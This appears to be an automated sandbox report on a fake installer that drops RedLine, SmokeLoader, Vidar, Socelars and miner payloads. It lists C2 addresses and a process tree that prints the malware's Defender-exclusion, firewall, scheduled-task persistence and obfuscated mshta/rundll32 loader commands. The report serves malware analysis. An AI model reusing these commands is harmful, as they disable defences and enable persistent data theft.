Resubmissions
11-10-2021 20:45
211011-zjxjlsabbm 1011-10-2021 13:10
211011-qegsxshcfp 1011-10-2021 10:55
211011-mz7y3ahaak 1010-10-2021 19:24
211010-x4mtssgae2 10Analysis
-
max time kernel
1812s -
max time network
1826s -
platform
windows11_x64 -
resource
win11 -
submitted
11-10-2021 10:55
General
-
Target
setup_x86_x64_install.exe
-
Size
3.9MB
-
MD5
a4d23ac3c7172b9aa02e35b6bf0fd21f
-
SHA1
0326aab7deddfefc048c9a67ac9ce4ee14ea9003
-
SHA256
9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806
-
SHA512
9e425d8a1beaeabfc983bb75a7a5f8a8c0823e825e9f66e17b0f515b2897da9f2d9b2f1aa9939fdbae6c826c2c730d3bc772abec9e35a61d3d73a6cdb87ddf10
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
ANI
C2
45.142.215.47:27643
Extracted
Family
smokeloader
Version
2020
C2
http://linavanandr11.club/
http://iselaharty12.club/
http://giovaninardo13.club/
http://zayneliann14.club/
http://zorinosali15.club/
rc4.i32
rc4.i32
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 19 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
suricata: ET MALWARE Zbot Generic URI/Header Struct .bin
suricata: ET MALWARE Zbot Generic URI/Header Struct .bin
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 1 IoCs
-
Loads dropped DLL 9 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 1 IoCs
Detects Themida, an advanced Windows software protection system.
-
Windows security modification 2 TTPs 10 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 9 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 39 IoCs
-
Suspicious use of SetThreadContext 6 IoCs
-
Drops file in Program Files directory 5 IoCs
-
Drops file in Windows directory 11 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 19 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 38 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 4 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS06954724\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS06954724\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152bab5a2de.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS06954724\Sun152bab5a2de.exeSun152bab5a2de.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15901f2f025e.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS06954724\Sun15901f2f025e.exeSun15901f2f025e.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1008 -s 16326⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15dbd675f871ca.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS06954724\Sun15dbd675f871ca.exeSun15dbd675f871ca.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\zUlC2Q4BfVWeU1lU7qi8JezK.exe"C:\Users\Admin\Pictures\Adobe Films\zUlC2Q4BfVWeU1lU7qi8JezK.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\luU0_5DplmXzND2h2sA9vflS.exe"C:\Users\Admin\Pictures\Adobe Films\luU0_5DplmXzND2h2sA9vflS.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\luU0_5DplmXzND2h2sA9vflS.exe"C:\Users\Admin\Pictures\Adobe Films\luU0_5DplmXzND2h2sA9vflS.exe"7⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Pictures\Adobe Films\9dp4_uPiS4Un9pmFmTxJ04Ij.exe"C:\Users\Admin\Pictures\Adobe Films\9dp4_uPiS4Un9pmFmTxJ04Ij.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 2367⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ytI6Pmp7bpxBzM2ePUadSNg0.exe"C:\Users\Admin\Pictures\Adobe Films\ytI6Pmp7bpxBzM2ePUadSNg0.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\bbHEeUWIbx7KLCOvj8bIUZjE.exe"C:\Users\Admin\Pictures\Adobe Films\bbHEeUWIbx7KLCOvj8bIUZjE.exe"6⤵
- Executes dropped EXE
-
C:\ProgramData\build.exe"C:\ProgramData\build.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 17048⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\oehnlVZnXu2z_DKRxUV6preg.exe"C:\Users\Admin\Pictures\Adobe Films\oehnlVZnXu2z_DKRxUV6preg.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5476 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\qmFIodO0jvQlbVpq3r2VqyDI.exe"C:\Users\Admin\Pictures\Adobe Films\qmFIodO0jvQlbVpq3r2VqyDI.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\wUd40ruwE9QmwiLaM7Ay04NP.exe"C:\Users\Admin\Pictures\Adobe Films\wUd40ruwE9QmwiLaM7Ay04NP.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Pictures\Adobe Films\AwvbBpo0VVz5c8sULxb_cbno.exe"C:\Users\Admin\Pictures\Adobe Films\AwvbBpo0VVz5c8sULxb_cbno.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1707690.scr"C:\Users\Admin\AppData\Roaming\1707690.scr" /S7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\1821053.scr"C:\Users\Admin\AppData\Roaming\1821053.scr" /S7⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
-
C:\Users\Admin\AppData\Roaming\4988956.scr"C:\Users\Admin\AppData\Roaming\4988956.scr" /S7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\5137688.scr"C:\Users\Admin\AppData\Roaming\5137688.scr" /S7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\1011117.scr"C:\Users\Admin\AppData\Roaming\1011117.scr" /S7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mwvoPHNJjiqvyCcvIch3ZVbY.exe"C:\Users\Admin\Pictures\Adobe Films\mwvoPHNJjiqvyCcvIch3ZVbY.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 3007⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\3YbLemIoqe3uurTYdVcLylRr.exe"C:\Users\Admin\Pictures\Adobe Films\3YbLemIoqe3uurTYdVcLylRr.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\3YbLemIoqe3uurTYdVcLylRr.exe"C:\Users\Admin\Pictures\Adobe Films\3YbLemIoqe3uurTYdVcLylRr.exe"7⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 19407⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\3mlVFbxNQUHro2vr4i7_r39F.exe"C:\Users\Admin\Pictures\Adobe Films\3mlVFbxNQUHro2vr4i7_r39F.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\y24we7dqXEQFnqlu8heyrzOP.exe"C:\Users\Admin\Pictures\Adobe Films\y24we7dqXEQFnqlu8heyrzOP.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\9QCLebCBwfOGsFtoeWcnmQ6L.exe"C:\Users\Admin\Pictures\Adobe Films\9QCLebCBwfOGsFtoeWcnmQ6L.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\YF7C2qE8B3IsroQPWR6hhwX4.exe"C:\Users\Admin\Pictures\Adobe Films\YF7C2qE8B3IsroQPWR6hhwX4.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 2807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\BJTgcaWBDihNFfYPZb3riUwD.exe"C:\Users\Admin\Pictures\Adobe Films\BJTgcaWBDihNFfYPZb3riUwD.exe"6⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\e739ee48-4b26-4abb-9801-20de28aeff73\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\e739ee48-4b26-4abb-9801-20de28aeff73\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e739ee48-4b26-4abb-9801-20de28aeff73\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run7⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e739ee48-4b26-4abb-9801-20de28aeff73\test.bat"8⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\BJTgcaWBDihNFfYPZb3riUwD.exe" -Force7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Pictures\Adobe Films\BJTgcaWBDihNFfYPZb3riUwD.exe"C:\Users\Admin\Pictures\Adobe Films\BJTgcaWBDihNFfYPZb3riUwD.exe"7⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5668 -s 22687⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\dhFhEMtMmMVBc81_f9AF5JGm.exe"C:\Users\Admin\Pictures\Adobe Films\dhFhEMtMmMVBc81_f9AF5JGm.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"7⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Pictures\Adobe Films\wRI7TsmDln2jJ9rSQTbwnVME.exe"C:\Users\Admin\Pictures\Adobe Films\wRI7TsmDln2jJ9rSQTbwnVME.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\_m0efJKN5GF8A2EmOOQo35rG.exe"C:\Users\Admin\Pictures\Adobe Films\_m0efJKN5GF8A2EmOOQo35rG.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\_m0efJKN5GF8A2EmOOQo35rG.exe"C:\Users\Admin\Pictures\Adobe Films\_m0efJKN5GF8A2EmOOQo35rG.exe"7⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Pictures\Adobe Films\4iPdEuZunDzyXSeMKj9mspGT.exe"C:\Users\Admin\Pictures\Adobe Films\4iPdEuZunDzyXSeMKj9mspGT.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\OnnbJbZ5pchAYdaTwFNLHw36.exe"C:\Users\Admin\Pictures\Adobe Films\OnnbJbZ5pchAYdaTwFNLHw36.exe"6⤵
- Executes dropped EXE
- Drops startup file
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MjpFiZVjH.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MjpFiZVjH.exe"7⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM8⤵
- Creates scheduled task(s)
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal8⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\9⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes9⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes9⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\dOQLnTOvgy_UxBt03dThhTcG.exe"C:\Users\Admin\Pictures\Adobe Films\dOQLnTOvgy_UxBt03dThhTcG.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2428 -s 2687⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\YxsCDC7PCsMbrRxTLdpeSjPw.exe"C:\Users\Admin\Pictures\Adobe Films\YxsCDC7PCsMbrRxTLdpeSjPw.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\NGsyXdVeWanAc0BteC5lTBNQ.exe"C:\Users\Admin\Pictures\Adobe Films\NGsyXdVeWanAc0BteC5lTBNQ.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15f67075f27a2b5b.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS06954724\Sun15f67075f27a2b5b.exeSun15f67075f27a2b5b.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\6703036.scr"C:\Users\Admin\AppData\Roaming\6703036.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\2524259.scr"C:\Users\Admin\AppData\Roaming\2524259.scr" /S6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\3004754.scr"C:\Users\Admin\AppData\Roaming\3004754.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\5988557.scr"C:\Users\Admin\AppData\Roaming\5988557.scr" /S6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1577c3e159a3e3815.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS06954724\Sun1577c3e159a3e3815.exeSun1577c3e159a3e3815.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3180 -s 2926⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15f1b1f8c669.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS06954724\Sun15f1b1f8c669.exeSun15f1b1f8c669.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 3246⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun159ff1acacf.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS06954724\Sun159ff1acacf.exeSun159ff1acacf.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS06954724\Sun159ff1acacf.exeC:\Users\Admin\AppData\Local\Temp\7zS06954724\Sun159ff1acacf.exe6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152bea652bd7232.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS06954724\Sun152bea652bd7232.exeSun152bea652bd7232.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1507db358fce61c0b.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS06954724\Sun1507db358fce61c0b.exeSun1507db358fce61c0b.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 2806⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun158d8ef840.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS06954724\Sun158d8ef840.exeSun158d8ef840.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS06954724\Sun158d8ef840.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS06954724\Sun158d8ef840.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS06954724\Sun158d8ef840.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS06954724\Sun158d8ef840.exe" ) do taskkill /F -Im "%~NxU"7⤵
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"10⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I12⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I14⤵
- Loads dropped DLL
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Sun158d8ef840.exe"8⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152e52d07b74d9b5.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS06954724\Sun152e52d07b74d9b5.exeSun152e52d07b74d9b5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2276 -s 19206⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
-
-
C:\Windows\System32\Upfc.exeC:\Windows\System32\Upfc.exe /launchtype periodic /cv vUTNTj+LSkG2KAeaWjURqw.01⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv vUTNTj+LSkG2KAeaWjURqw.0.22⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 4d2677899b6d76182d6b82aa91be525d vUTNTj+LSkG2KAeaWjURqw.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
